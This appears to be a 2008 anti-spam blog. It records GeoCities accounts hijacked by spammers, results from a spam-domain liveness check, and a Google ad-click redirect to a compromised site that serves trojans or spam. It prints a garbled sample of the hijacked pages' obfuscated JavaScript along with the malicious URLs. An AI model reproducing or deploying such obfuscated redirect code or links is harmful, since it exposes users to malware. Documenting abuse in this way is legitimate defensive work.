Should anyone forget, geocities.com is owned by Yahoo! And currently, Yahoo! is under market attack, stock market attack. As such, should not be of any wonder if the management is a bit distracted. Proof is in the names spammers are using to hijack account at geocities. Here are two (2) examples.
http://www.geocities.com/bnnmqsfqa
http://www. geocities.com/dtspdzkrzxsx
They both have their own sets of obfuscated javascript. Example below.
----
<script language="JavaScript" type="text/javascript">var pcyr='dnbwddumxrutoetjbi';var jryb=0;var zvunzgj, woqv, nueexs='581D01050D14014D14131B131A04130F5F4B2E0F1416370707040806574A180C1A0E0D1E4A1A0D074A081A0E19061C1B014B1C18070F445342500C10011D425D5A060A1518130F0C0A40011809434E515701160606150054';woqv='';var xhbgqyi;for( zvunzgj=0;zvunzgj < xhbgqyi =" unescape(">= pcyr.length ) jryb = 0;}document.write(woqv);</script>
Tuesday, May 27, 2008
Tuesday, May 6, 2008
Check of Spam Domainsh
Here are some numbers from the latest domain check. After 38+ hours, with run ending on:
May 5, 2008 around 14:00 Pacific Time.
The webpages are responding POORLY to searchs for keywords. More on this later.
May 5, 2008 around 14:00 Pacific Time.
- Domains Checked 7958
- ALIVE 3322
- DEAD 995
- UNKNOWN 3642
- got the IP number (via ping)
- checked for ping response
- requested a webpage and checked for the response
The webpages are responding POORLY to searchs for keywords. More on this later.
Thursday, May 1, 2008
They are pulling out stops
Somewhere someone is making head way on SPAM as the URL below indicates.
In translation, google ad meter launches the link to a compromised website. The target link inturn, is either an exe with a trojan, or a redirect link to a SPAM sender, or SPAM payoff itself (like rolex of viagra).
To be clear, target link may be rotating. That is, in some cases you might get any of the three depending on the link. An exe one time, a payoff the next time, etc.
<a hef="http://www.google.com/pagead/iclk?sa=l&ai=aOthDdS&num=36269=
&adurl=http://www.ag-computer-team.de/index1.php" =
style="color:#121212; font-weight:bold;">
UPDATE 06-06-2008: To be clear on the above, the rotation is in email, not the target link. That is, the email carries the rotation, not the website.
In translation, google ad meter launches the link to a compromised website. The target link inturn, is either an exe with a trojan, or a redirect link to a SPAM sender, or SPAM payoff itself (like rolex of viagra).
To be clear, target link may be rotating. That is, in some cases you might get any of the three depending on the link. An exe one time, a payoff the next time, etc.
<a hef="http://www.google.com/pagead/iclk?sa=l&ai=aOthDdS&num=36269=
&adurl=http://www.ag-computer-team.de/index1.php" =
style="color:#121212; font-weight:bold;">
UPDATE 06-06-2008: To be clear on the above, the rotation is in email, not the target link. That is, the email carries the rotation, not the website.
Subscribe to:
Posts (Atom)